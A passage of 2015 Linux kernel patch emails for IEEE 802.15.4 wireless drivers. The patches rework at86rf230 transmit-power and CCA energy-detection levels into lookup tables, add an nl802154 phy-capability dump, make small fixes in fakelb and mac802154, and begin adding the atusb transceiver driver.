(*get_desense_steps)(struct at86rf230_local *, s32); + int (*set_txpower)(struct at86rf230_local *, s32); }; #define AT86RF2XX_MAX_BUF (127 + 3) @@ -124,9 +125,12 @@ struct at86rf230_local { #define SR_IRQ_2_EXT_EN 0x04, 0x40, 6 #define SR_PA_EXT_EN 0x04, 0x80, 7 #define RG_PHY_TX_PWR (0x05) -#define SR_TX_PWR 0x05, 0x0f, 0 -#define SR_PA_LT 0x05, 0x30, 4 -#define SR_PA_BUF_LT 0x05, 0xc0, 6 +#define SR_TX_PWR_23X 0x05, 0x0f, 0 +#define SR_PA_LT_230 0x05, 0x30, 4 +#define SR_PA_BUF_LT_230 0x05, 0xc0, 6 +#define SR_TX_PWR_212 0x05, 0x1f, 0 +#define SR_GC_PA_212 0x05, 0x60, 5 +#define SR_PA_BOOST_LT_212 0x05, 0x80, 7 #define RG_PHY_RSSI (0x06) #define SR_RSSI 0x06, 0x1f, 0 #define SR_RND_VALUE 0x06, 0x60, 5 @@ -1193,24 +1197,56 @@ at86rf230_set_hw_addr_filt(struct ieee802154_hw *hw, return 0; } +#define AT86RF23X_MAX_TX_POWERS 0xF +static const s32 at86rf233_powers[AT86RF23X_MAX_TX_POWERS + 1] = { + 400, 370, 340, 300, 250, 200, 100, 0, -100, -200, -300, -400, -600, + -800, -1200, -1700, +}; + +static const s32 at86rf231_powers[AT86RF23X_MAX_TX_POWERS + 1] = { + 300, 280, 230, 180, 130, 70, 0, -100, -200, -300, -400, -500, -700, + -900, -1200, -1700, +}; + +#define AT86RF212_MAX_TX_POWERS 0x1F +static const s32 at86rf212_powers[AT86RF212_MAX_TX_POWERS + 1] = { + 500, 400, 300, 200, 100, 0, -100, -200, -300, -400, -500, -600, -700, + -800, -900, -1000, -1100, -1200, -1300, -1400, -1500, -1600, -1700, + -1800, -1900, -2000, -2100, -2200, -2300, -2400, -2500, -2600, +}; + static int -at86rf230_set_txpower(struct ieee802154_hw *hw, s32 mbm) +at86rf23x_set_txpower(struct at86rf230_local *lp, s32 mbm) { - struct at86rf230_local *lp = 
hw->priv; - s8 db = mbm / 100; + u32 i; - /* typical maximum output is 5dBm with RG_PHY_TX_PWR 0x60, lower five - * bits decrease power in 1dB steps. 0x60 represents extra PA gain of - * 0dB. - * thus, supported values for db range from -26 to 5, for 31dB of - * reduction to 0dB of reduction. - */ - if (db > 5 || db < -26) - return -EINVAL; + for (i = 0; i < lp->hw->phy->supported.tx_powers_size; i++) { + if (lp->hw->phy->supported.tx_powers[i] == mbm) + return at86rf230_write_subreg(lp, SR_TX_PWR_23X, i); + } + + return -EINVAL; +} + +static int +at86rf212_set_txpower(struct at86rf230_local *lp, s32 mbm) +{ + u32 i; + + for (i = 0; i < lp->hw->phy->supported.tx_powers_size; i++) { + if (lp->hw->phy->supported.tx_powers[i] == mbm) + return at86rf230_write_subreg(lp, SR_TX_PWR_212, i); + } - db = -(db - 5); + return -EINVAL; +} + +static int +at86rf230_set_txpower(struct ieee802154_hw *hw, s32 mbm) +{ + struct at86rf230_local *lp = hw->priv; - return __at86rf230_write(lp, RG_PHY_TX_PWR, 0x60 | db); + return lp->data->set_txpower(lp, mbm); } static int @@ -1367,7 +1403,8 @@ static struct at86rf2xx_chip_data at86rf233_data = { .t_p_ack = 545, .rssi_base_val = -91, .set_channel = at86rf23x_set_channel, - .get_desense_steps = at86rf23x_get_desens_steps + .get_desense_steps = at86rf23x_get_desens_steps, + .set_txpower = at86rf23x_set_txpower, }; static struct at86rf2xx_chip_data at86rf231_data = { @@ -1380,7 +1417,8 @@ static struct at86rf2xx_chip_data at86rf231_data = { .t_p_ack = 545, .rssi_base_val = -91, .set_channel = at86rf23x_set_channel, - .get_desense_steps = at86rf23x_get_desens_steps + .get_desense_steps = at86rf23x_get_desens_steps, + .set_txpower = at86rf23x_set_txpower, }; static struct at86rf2xx_chip_data at86rf212_data = { @@ -1393,7 +1431,8 @@ static struct at86rf2xx_chip_data at86rf212_data = { .t_p_ack = 545, .rssi_base_val = -100, .set_channel = at86rf212_set_channel, - .get_desense_steps = at86rf212_get_desens_steps + .get_desense_steps = at86rf212_get_desens_steps, + .set_txpower = at86rf212_set_txpower, }; static int at86rf230_hw_init(struct at86rf230_local *lp, u8 xtal_trim) @@ -1592,6 +1631,8 @@ at86rf230_detect_device(struct at86rf230_local *lp) lp->hw->phy->supported.channels[0] = 0x7FFF800; lp->hw->phy->current_channel = 11; lp->hw->phy->symbol_duration = 16; + lp->hw->phy->supported.tx_powers = at86rf231_powers; + lp->hw->phy->supported.tx_powers_size = ARRAY_SIZE(at86rf231_powers); break; case 7: chip = "at86rf212"; @@ -1602,6 +1643,8 @@ at86rf230_detect_device(struct at86rf230_local *lp) lp->hw->phy->current_channel = 5; lp->hw->phy->symbol_duration = 25; lp->hw->phy->supported.lbt = NL802154_SUPPORTED_BOOL_BOTH; + lp->hw->phy->supported.tx_powers = at86rf212_powers; + lp->hw->phy->supported.tx_powers_size = ARRAY_SIZE(at86rf212_powers); break; case 11: chip = "at86rf233"; @@ -1609,6 +1652,8 @@ at86rf230_detect_device(struct at86rf230_local *lp) lp->hw->phy->supported.channels[0] = 0x7FFF800; lp->hw->phy->current_channel = 13; lp->hw->phy->symbol_duration = 16; + lp->hw->phy->supported.tx_powers = at86rf233_powers; + lp->hw->phy->supported.tx_powers_size = ARRAY_SIZE(at86rf233_powers); break; default: chip = "unknown"; From 2d9fe7ab372a75c0148027bc48a18a64f150a7e7 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:50 +0200 Subject: [PATCH 091/872] at86rf230: rework tx cca energy detection level This patch reworks the cca energy detection level handling. 
This contains a calculation which works on all transceiver types and add support for dump cca energy detection levels. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 79 ++++++++++++++++++++++-------- 1 file changed, 59 insertions(+), 20 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index dff7e47f5afb..833c42640e40 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -50,7 +50,6 @@ struct at86rf2xx_chip_data { int rssi_base_val; int (*set_channel)(struct at86rf230_local *, u8, u8); - int (*get_desense_steps)(struct at86rf230_local *, s32); int (*set_txpower)(struct at86rf230_local *, s32); }; @@ -1080,6 +1079,50 @@ at86rf23x_set_channel(struct at86rf230_local *lp, u8 page, u8 channel) return at86rf230_write_subreg(lp, SR_CHANNEL, channel); } +#define AT86RF2XX_MAX_ED_LEVELS 0xF +static const s32 at86rf23x_ed_levels[AT86RF2XX_MAX_ED_LEVELS + 1] = { + -9100, -8900, -8700, -8500, -8300, -8100, -7900, -7700, -7500, -7300, + -7100, -6900, -6700, -6500, -6300, -6100, +}; + +static const s32 at86rf212_ed_levels_100[AT86RF2XX_MAX_ED_LEVELS + 1] = { + -10000, -9800, -9600, -9400, -9200, -9000, -8800, -8600, -8400, -8200, + -8000, -7800, -7600, -7400, -7200, +}; + +static const s32 at86rf212_ed_levels_98[AT86RF2XX_MAX_ED_LEVELS + 1] = { + -9800, -9600, -9400, -9200, -9000, -8800, -8600, -8400, -8200, -8000, + -7800, -7600, -7400, -7200, -7000, +}; + +static inline int +at86rf212_update_cca_ed_level(struct at86rf230_local *lp, int rssi_base_val) +{ + unsigned int cca_ed_thres; + int rc; + + rc = at86rf230_read_subreg(lp, SR_CCA_ED_THRES, &cca_ed_thres); + if (rc < 0) + return rc; + + switch (rssi_base_val) { + case -98: + lp->hw->phy->supported.cca_ed_levels = at86rf212_ed_levels_98; + lp->hw->phy->supported.cca_ed_levels_size = ARRAY_SIZE(at86rf212_ed_levels_98); + lp->hw->phy->cca_ed_level = at86rf212_ed_levels_98[cca_ed_thres]; + break; + case -100: + lp->hw->phy->supported.cca_ed_levels = at86rf212_ed_levels_100; + lp->hw->phy->supported.cca_ed_levels_size = ARRAY_SIZE(at86rf212_ed_levels_100); + lp->hw->phy->cca_ed_level = at86rf212_ed_levels_100[cca_ed_thres]; + break; + default: + WARN_ON(1); + } + + return 0; +} + static int at86rf212_set_channel(struct at86rf230_local *lp, u8 page, u8 channel) { @@ -1102,6 +1145,10 @@ at86rf212_set_channel(struct at86rf230_local *lp, u8 page, u8 channel) if (rc < 0) return rc; + rc = at86rf212_update_cca_ed_level(lp, lp->data->rssi_base_val); + if (rc < 0) + return rc; + /* This sets the symbol_duration according frequency on the 212. * TODO move this handling while set channel and page in cfg802154. * We can do that, this timings are according 802.15.4 standard. 
@@ -1291,29 +1338,19 @@ at86rf230_set_cca_mode(struct ieee802154_hw *hw, return at86rf230_write_subreg(lp, SR_CCA_MODE, val); } -static int -at86rf212_get_desens_steps(struct at86rf230_local *lp, s32 level) -{ - return (level - lp->data->rssi_base_val) * 100 / 207; -} - -static int -at86rf23x_get_desens_steps(struct at86rf230_local *lp, s32 level) -{ - return (level - lp->data->rssi_base_val) / 2; -} static int at86rf230_set_cca_ed_level(struct ieee802154_hw *hw, s32 mbm) { struct at86rf230_local *lp = hw->priv; - s32 level = mbm / 100; + u32 i; - if (level < lp->data->rssi_base_val || level > 30) - return -EINVAL; + for (i = 0; i < hw->phy->supported.cca_ed_levels_size; i++) { + if (hw->phy->supported.cca_ed_levels[i] == mbm) + return at86rf230_write_subreg(lp, SR_CCA_ED_THRES, i); + } - return at86rf230_write_subreg(lp, SR_CCA_ED_THRES, - lp->data->get_desense_steps(lp, level)); + return -EINVAL; } static int @@ -1403,7 +1440,6 @@ static struct at86rf2xx_chip_data at86rf233_data = { .t_p_ack = 545, .rssi_base_val = -91, .set_channel = at86rf23x_set_channel, - .get_desense_steps = at86rf23x_get_desens_steps, .set_txpower = at86rf23x_set_txpower, }; @@ -1417,7 +1453,6 @@ static struct at86rf2xx_chip_data at86rf231_data = { .t_p_ack = 545, .rssi_base_val = -91, .set_channel = at86rf23x_set_channel, - .get_desense_steps = at86rf23x_get_desens_steps, .set_txpower = at86rf23x_set_txpower, }; @@ -1431,7 +1466,6 @@ static struct at86rf2xx_chip_data at86rf212_data = { .t_p_ack = 545, .rssi_base_val = -100, .set_channel = at86rf212_set_channel, - .get_desense_steps = at86rf212_get_desens_steps, .set_txpower = at86rf212_set_txpower, }; @@ -1618,6 +1652,9 @@ at86rf230_detect_device(struct at86rf230_local *lp) lp->hw->phy->supported.cca_opts = BIT(NL802154_CCA_OPT_ENERGY_CARRIER_AND) | BIT(NL802154_CCA_OPT_ENERGY_CARRIER_OR); + lp->hw->phy->supported.cca_ed_levels = at86rf23x_ed_levels; + lp->hw->phy->supported.cca_ed_levels_size = ARRAY_SIZE(at86rf23x_ed_levels); + lp->hw->phy->cca.mode = NL802154_CCA_ENERGY; switch (part) { @@ -1645,6 +1682,8 @@ at86rf230_detect_device(struct at86rf230_local *lp) lp->hw->phy->supported.lbt = NL802154_SUPPORTED_BOOL_BOTH; lp->hw->phy->supported.tx_powers = at86rf212_powers; lp->hw->phy->supported.tx_powers_size = ARRAY_SIZE(at86rf212_powers); + lp->hw->phy->supported.cca_ed_levels = at86rf212_ed_levels_100; + lp->hw->phy->supported.cca_ed_levels_size = ARRAY_SIZE(at86rf212_ed_levels_100); break; case 11: chip = "at86rf233"; From cc643496c0c3f242e5df9dc2bc243764d269d4f1 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:51 +0200 Subject: [PATCH 092/872] at86rf230: add cca ed level reset value This patch adds reset values for cca ed level values after running reset procedure. 
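The rework in the previous patch turned the per-chip arithmetic into a table lookup: the index of the requested mBm value inside supported.cca_ed_levels is exactly the value written to SR_CCA_ED_THRES, and this patch seeds phy->cca_ed_level from entry 7, the register's power-on default. A standalone sketch of that lookup in plain C, with the table copied from at86rf23x_ed_levels above; it is an illustration, not kernel code:

#include <stdio.h>

/* Mirrors at86rf230_set_cca_ed_level(): the array index doubles as
 * the SR_CCA_ED_THRES register value.
 */
static const int ed_levels[] = {
	-9100, -8900, -8700, -8500, -8300, -8100, -7900, -7700,
	-7500, -7300, -7100, -6900, -6700, -6500, -6300, -6100,
};

static int ed_level_to_reg(int mbm)
{
	unsigned int i;

	for (i = 0; i < sizeof(ed_levels) / sizeof(ed_levels[0]); i++)
		if (ed_levels[i] == mbm)
			return i;
	return -1;		/* the driver returns -EINVAL here */
}

int main(void)
{
	printf("reg for -7700 mBm: %d\n", ed_level_to_reg(-7700)); /* 7 */
	printf("reset default (index 7): %d mBm\n", ed_levels[7]); /* -7700 */
	return 0;
}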
Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 833c42640e40..3aa7bc9488e4 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1661,7 +1661,7 @@ at86rf230_detect_device(struct at86rf230_local *lp) case 2: chip = "at86rf230"; rc = -ENOTSUPP; - break; + goto not_supp; case 3: chip = "at86rf231"; lp->data = &at86rf231_data; @@ -1697,9 +1697,12 @@ at86rf230_detect_device(struct at86rf230_local *lp) default: chip = "unknown"; rc = -ENOTSUPP; - break; + goto not_supp; } + lp->hw->phy->cca_ed_level = lp->hw->phy->supported.cca_ed_levels[7]; + +not_supp: dev_info(&lp->spi->dev, "Detected %s chip version %d\n", chip, version); return rc; From 392f4e67ad96e1d686c700cba5e218d40347426d Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:52 +0200 Subject: [PATCH 093/872] at86rf230: add reset states of tx power level This patch adds the reset states for tx power levels after running reset procedure. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 3aa7bc9488e4..5601c743fa7b 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1701,6 +1701,7 @@ at86rf230_detect_device(struct at86rf230_local *lp) } lp->hw->phy->cca_ed_level = lp->hw->phy->supported.cca_ed_levels[7]; + lp->hw->phy->transmit_power = lp->hw->phy->supported.tx_powers[0]; not_supp: dev_info(&lp->spi->dev, "Detected %s chip version %d\n", chip, version); From 0e66545701014814360b08a7a43ca652f82b6e5a Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:53 +0200 Subject: [PATCH 094/872] nl802154: add support for dump phy capabilities This patch add support to nl802154 to dump all phy capabilities which is inside the wpan_phy_supported struct. Also we introduce a new method to dumping supported channels. The new method will offer a easier interface and has lesser netlink traffic. 
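The capability dump below encodes bit masks (channels per page, CCA modes and options, iftypes) as nested attributes whose attribute type is the bit position, via the new nl802154_put_flags() helper; a reader reconstructs the mask by OR-ing BIT(type) for every nested flag attribute it finds. A small standalone sketch of that encode/decode scheme in plain C; the printf calls stand in for nla_put_flag()/nla_type(), which are not used here:

#include <stdio.h>

/* Encode: every set bit becomes a flag attribute whose type is the
 * bit index (what nl802154_put_flags() does with nla_put_flag()).
 */
static void emit_flags(unsigned int mask)
{
	int i = 0;

	while (mask) {
		if (mask & 1)
			printf("flag attr, type %d\n", i);
		mask >>= 1;
		i++;
	}
}

/* Decode: OR in BIT(type) for each flag attribute found in the nest. */
static unsigned int collect_flags(const int *types, int n)
{
	unsigned int mask = 0;
	int i;

	for (i = 0; i < n; i++)
		mask |= 1u << types[i];
	return mask;
}

int main(void)
{
	int types[] = { 0, 2 };				/* bits 0 and 2 */

	emit_flags(0x5);				/* prints types 0 and 2 */
	printf("mask 0x%x\n", collect_flags(types, 2));	/* 0x5 */
	return 0;
}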
Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- include/net/nl802154.h | 57 +++++++++++++++++++ net/ieee802154/nl802154.c | 117 +++++++++++++++++++++++++++++++++++++- 2 files changed, 173 insertions(+), 1 deletion(-) diff --git a/include/net/nl802154.h b/include/net/nl802154.h index 055277156eef..0badebd1de7f 100644 --- a/include/net/nl802154.h +++ b/include/net/nl802154.h @@ -100,6 +100,8 @@ enum nl802154_attrs { NL802154_ATTR_EXTENDED_ADDR, + NL802154_ATTR_WPAN_PHY_CAPS, + /* add attributes here, update the policy in nl802154.c */ __NL802154_ATTR_AFTER_LAST, @@ -119,6 +121,61 @@ enum nl802154_iftype { NL802154_IFTYPE_MAX = NUM_NL802154_IFTYPES - 1 }; +/** + * enum nl802154_wpan_phy_capability_attr - wpan phy capability attributes + * + * @__NL802154_CAP_ATTR_INVALID: attribute number 0 is reserved + * @NL802154_CAP_ATTR_CHANNELS: a nested attribute for nl802154_channel_attr + * @NL802154_CAP_ATTR_TX_POWERS: a nested attribute for + * nl802154_wpan_phy_tx_power + * @NL802154_CAP_ATTR_MIN_CCA_ED_LEVEL: minimum value for cca_ed_level + * @NL802154_CAP_ATTR_MAX_CCA_ED_LEVEL: maxmimum value for cca_ed_level + * @NL802154_CAP_ATTR_CCA_MODES: nl802154_cca_modes flags + * @NL802154_CAP_ATTR_CCA_OPTS: nl802154_cca_opts flags + * @NL802154_CAP_ATTR_MIN_MINBE: minimum of minbe value + * @NL802154_CAP_ATTR_MAX_MINBE: maximum of minbe value + * @NL802154_CAP_ATTR_MIN_MAXBE: minimum of maxbe value + * @NL802154_CAP_ATTR_MAX_MINBE: maximum of maxbe value + * @NL802154_CAP_ATTR_MIN_CSMA_BACKOFFS: minimum of csma backoff value + * @NL802154_CAP_ATTR_MAX_CSMA_BACKOFFS: maximum of csma backoffs value + * @NL802154_CAP_ATTR_MIN_FRAME_RETRIES: minimum of frame retries value + * @NL802154_CAP_ATTR_MAX_FRAME_RETRIES: maximum of frame retries value + * @NL802154_CAP_ATTR_IFTYPES: nl802154_iftype flags + * @NL802154_CAP_ATTR_LBT: nl802154_supported_bool_states flags + * @NL802154_CAP_ATTR_MAX: highest cap attribute currently defined + * @__NL802154_CAP_ATTR_AFTER_LAST: internal use + */ +enum nl802154_wpan_phy_capability_attr { + __NL802154_CAP_ATTR_INVALID, + + NL802154_CAP_ATTR_IFTYPES, + + NL802154_CAP_ATTR_CHANNELS, + NL802154_CAP_ATTR_TX_POWERS, + + NL802154_CAP_ATTR_CCA_ED_LEVELS, + NL802154_CAP_ATTR_CCA_MODES, + NL802154_CAP_ATTR_CCA_OPTS, + + NL802154_CAP_ATTR_MIN_MINBE, + NL802154_CAP_ATTR_MAX_MINBE, + + NL802154_CAP_ATTR_MIN_MAXBE, + NL802154_CAP_ATTR_MAX_MAXBE, + + NL802154_CAP_ATTR_MIN_CSMA_BACKOFFS, + NL802154_CAP_ATTR_MAX_CSMA_BACKOFFS, + + NL802154_CAP_ATTR_MIN_FRAME_RETRIES, + NL802154_CAP_ATTR_MAX_FRAME_RETRIES, + + NL802154_CAP_ATTR_LBT, + + /* keep last */ + __NL802154_CAP_ATTR_AFTER_LAST, + NL802154_CAP_ATTR_MAX = __NL802154_CAP_ATTR_AFTER_LAST - 1 +}; + /** * enum nl802154_cca_modes - cca modes * diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index 3afb20e43ff8..54f4959fc9bb 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -225,6 +225,8 @@ static const struct nla_policy nl802154_policy[NL802154_ATTR_MAX+1] = { [NL802154_ATTR_MAX_FRAME_RETRIES] = { .type = NLA_S8, }, [NL802154_ATTR_LBT_MODE] = { .type = NLA_U8, }, + + [NL802154_ATTR_WPAN_PHY_CAPS] = { .type = NLA_NESTED }, }; /* message building helper */ @@ -235,6 +237,28 @@ static inline void *nl802154hdr_put(struct sk_buff *skb, u32 portid, u32 seq, return genlmsg_put(skb, portid, seq, &nl802154_fam, flags, cmd); } +static int +nl802154_put_flags(struct sk_buff *msg, int attr, u32 mask) +{ + struct nlattr *nl_flags = nla_nest_start(msg, attr); + int i; + + if (!nl_flags) + 
return -ENOBUFS; + + i = 0; + while (mask) { + if ((mask & 1) && nla_put_flag(msg, i)) + return -ENOBUFS; + + mask >>= 1; + i++; + } + + nla_nest_end(msg, nl_flags); + return 0; +} + static int nl802154_send_wpan_phy_channels(struct cfg802154_registered_device *rdev, struct sk_buff *msg) @@ -256,6 +280,92 @@ nl802154_send_wpan_phy_channels(struct cfg802154_registered_device *rdev, return 0; } +static int +nl802154_put_capabilities(struct sk_buff *msg, + struct cfg802154_registered_device *rdev) +{ + const struct wpan_phy_supported *caps = &rdev->wpan_phy.supported; + struct nlattr *nl_caps, *nl_channels; + int i; + + nl_caps = nla_nest_start(msg, NL802154_ATTR_WPAN_PHY_CAPS); + if (!nl_caps) + return -ENOBUFS; + + nl_channels = nla_nest_start(msg, NL802154_CAP_ATTR_CHANNELS); + if (!nl_channels) + return -ENOBUFS; + + for (i = 0; i <= IEEE802154_MAX_PAGE; i++) { + if (caps->channels[i]) { + if (nl802154_put_flags(msg, i, caps->channels[i])) + return -ENOBUFS; + } + } + + nla_nest_end(msg, nl_channels); + + if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_ED_LEVEL) { + struct nlattr *nl_ed_lvls; + + nl_ed_lvls = nla_nest_start(msg, + NL802154_CAP_ATTR_CCA_ED_LEVELS); + if (!nl_ed_lvls) + return -ENOBUFS; + + for (i = 0; i < caps->cca_ed_levels_size; i++) { + if (nla_put_s32(msg, i, caps->cca_ed_levels[i])) + return -ENOBUFS; + } + + nla_nest_end(msg, nl_ed_lvls); + } + + if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_TXPOWER) { + struct nlattr *nl_tx_pwrs; + + nl_tx_pwrs = nla_nest_start(msg, NL802154_CAP_ATTR_TX_POWERS); + if (!nl_tx_pwrs) + return -ENOBUFS; + + for (i = 0; i < caps->tx_powers_size; i++) { + if (nla_put_s32(msg, i, caps->tx_powers[i])) + return -ENOBUFS; + } + + nla_nest_end(msg, nl_tx_pwrs); + } + + if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_MODE) { + if (nl802154_put_flags(msg, NL802154_CAP_ATTR_CCA_MODES, + caps->cca_modes) || + nl802154_put_flags(msg, NL802154_CAP_ATTR_CCA_OPTS, + caps->cca_opts)) + return -ENOBUFS; + } + + if (nla_put_u8(msg, NL802154_CAP_ATTR_MIN_MINBE, caps->min_minbe) || + nla_put_u8(msg, NL802154_CAP_ATTR_MAX_MINBE, caps->max_minbe) || + nla_put_u8(msg, NL802154_CAP_ATTR_MIN_MAXBE, caps->min_maxbe) || + nla_put_u8(msg, NL802154_CAP_ATTR_MAX_MAXBE, caps->max_maxbe) || + nla_put_u8(msg, NL802154_CAP_ATTR_MIN_CSMA_BACKOFFS, + caps->min_csma_backoffs) || + nla_put_u8(msg, NL802154_CAP_ATTR_MAX_CSMA_BACKOFFS, + caps->max_csma_backoffs) || + nla_put_s8(msg, NL802154_CAP_ATTR_MIN_FRAME_RETRIES, + caps->min_frame_retries) || + nla_put_s8(msg, NL802154_CAP_ATTR_MAX_FRAME_RETRIES, + caps->max_frame_retries) || + nl802154_put_flags(msg, NL802154_CAP_ATTR_IFTYPES, + caps->iftypes) || + nla_put_u32(msg, NL802154_CAP_ATTR_LBT, caps->lbt)) + return -ENOBUFS; + + nla_nest_end(msg, nl_caps); + + return 0; +} + static int nl802154_send_wpan_phy(struct cfg802154_registered_device *rdev, enum nl802154_commands cmd, struct sk_buff *msg, u32 portid, u32 seq, @@ -286,7 +396,9 @@ static int nl802154_send_wpan_phy(struct cfg802154_registered_device *rdev, rdev->wpan_phy.current_channel)) goto nla_put_failure; - /* supported channels array */ + /* TODO remove this behaviour, we still keep support it for a while + * so users can change the behaviour to the new one. 
+ */ if (nl802154_send_wpan_phy_channels(rdev, msg)) goto nla_put_failure; @@ -309,6 +421,9 @@ static int nl802154_send_wpan_phy(struct cfg802154_registered_device *rdev, goto nla_put_failure; } + if (nl802154_put_capabilities(msg, rdev)) + goto nla_put_failure; + finish: genlmsg_end(msg, hdr); return 0; From cb97d9a3eb0be1e33db5535955e6629e800f3f0e Mon Sep 17 00:00:00 2001 From: Martin Townsend Date: Sun, 17 May 2015 21:44:54 +0200 Subject: [PATCH 095/872] mac802154: fakelb: Fix potential NULL pointer dereference. fakelb_hw_deliver creates a copy of the skb's header which can potentially return NULL so we now check for this before actually delivering to the 802.15.4 MAC layer. Signed-off-by: Martin Townsend Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 91bbf030a443..230f7da02165 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -69,7 +69,8 @@ fakelb_hw_deliver(struct fakelb_dev_priv *priv, struct sk_buff *skb) spin_lock(&priv->lock); if (priv->working) { newskb = pskb_copy(skb, GFP_ATOMIC); - ieee802154_rx_irqsafe(priv->hw, newskb, 0xcc); + if (newskb) + ieee802154_rx_irqsafe(priv->hw, newskb, 0xcc); } spin_unlock(&priv->lock); } From a2c390aa3d67f0c3a1465e246d1b7468c37abae4 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:55 +0200 Subject: [PATCH 096/872] at86rf230: fix callback for aret handling This patch fix the complete callback for going into aret on. Currently we starting after a state change into aret on again a state change into aret on which is not necessary. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 5601c743fa7b..8d5ed6e23ddb 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1013,7 +1013,7 @@ at86rf230_xmit_start(void *context) if (lp->is_tx_from_off) { lp->is_tx_from_off = false; at86rf230_async_state_change(lp, ctx, STATE_TX_ARET_ON, - at86rf230_xmit_tx_on, + at86rf230_write_frame, false); } else { at86rf230_async_state_change(lp, ctx, STATE_TX_ON, From 3862eba691e3928338e188915676dd4fa7cefcaa Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:56 +0200 Subject: [PATCH 097/872] mac802154: tx: allow xmit complete from hard irq Replace consume_skb with dev_consume_skb_any in ieee802154_xmit_complete which can be called in hard irq and other contexts. 
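With dev_consume_skb_any() in place, a driver may complete a transmission directly from its TX-done hard interrupt handler instead of bouncing through a workqueue. A hedged sketch of such a handler follows; the driver structure, IRQ wiring and tx_skb bookkeeping are invented, and the ieee802154_xmit_complete(hw, skb, ifs_handling) prototype is assumed from the mac802154 code touched above:

#include <linux/interrupt.h>
#include <linux/skbuff.h>
#include <net/mac802154.h>

/* Hypothetical TX-done hard-IRQ handler.  The mac802154 call below is
 * the one this patch makes safe from hard-irq context.
 */
struct foo_priv {
	struct ieee802154_hw *hw;
	struct sk_buff *tx_skb;
};

static irqreturn_t foo_tx_done_irq(int irq, void *dev_id)
{
	struct foo_priv *priv = dev_id;
	struct sk_buff *skb = priv->tx_skb;

	priv->tx_skb = NULL;
	/* false: don't let mac802154 run the IFS timer for this frame */
	ieee802154_xmit_complete(priv->hw, skb, false);

	return IRQ_HANDLED;
}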
Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/mac802154/util.c | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/net/mac802154/util.c b/net/mac802154/util.c index 150bf807e572..583435f38930 100644 --- a/net/mac802154/util.c +++ b/net/mac802154/util.c @@ -85,11 +85,10 @@ void ieee802154_xmit_complete(struct ieee802154_hw *hw, struct sk_buff *skb, hrtimer_start(&local->ifs_timer, ktime_set(0, hw->phy->sifs_period * NSEC_PER_USEC), HRTIMER_MODE_REL); - - consume_skb(skb); } else { ieee802154_wake_queue(hw); - consume_skb(skb); } + + dev_consume_skb_any(skb); } EXPORT_SYMBOL(ieee802154_xmit_complete); From 7490b008d123f9bd781f51ad86b543aed49f6200 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:57 +0200 Subject: [PATCH 098/872] ieee802154: add support for atusb transceiver This patch adds support for the atusb transceiver. The current driver supports basic functionality only. Possible further tasks would be to sync functionality with the at86rf230 driver, because the atusb use internally an at86rf231 transceiver. Some of these features need a firmware update like AACK and ARET handling. I did small changes to this driver to work with xmit_async callback and setting of a random extended perm address. Signed-off-by: Alexander Aring Cc: Werner Almesberger Cc: Stefan Schmidt Cc: Richard Sharpe Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/Kconfig | 10 + drivers/net/ieee802154/Makefile | 1 + drivers/net/ieee802154/at86rf230.c | 199 +-------- drivers/net/ieee802154/at86rf230.h | 220 +++++++++ drivers/net/ieee802154/atusb.c | 692 +++++++++++++++++++++++++++++ drivers/net/ieee802154/atusb.h | 84 ++++ 6 files changed, 1009 insertions(+), 197 deletions(-) create mode 100644 drivers/net/ieee802154/at86rf230.h create mode 100644 drivers/net/ieee802154/atusb.c create mode 100644 drivers/net/ieee802154/atusb.h diff --git a/drivers/net/ieee802154/Kconfig b/drivers/net/ieee802154/Kconfig index 1a3c3e57aa0b..1dd5ab8e5054 100644 --- a/drivers/net/ieee802154/Kconfig +++ b/drivers/net/ieee802154/Kconfig @@ -53,3 +53,13 @@ config IEEE802154_CC2520 This driver can also be built as a module. To do so, say M here. the module will be called 'cc2520'. + +config IEEE802154_ATUSB + tristate "ATUSB 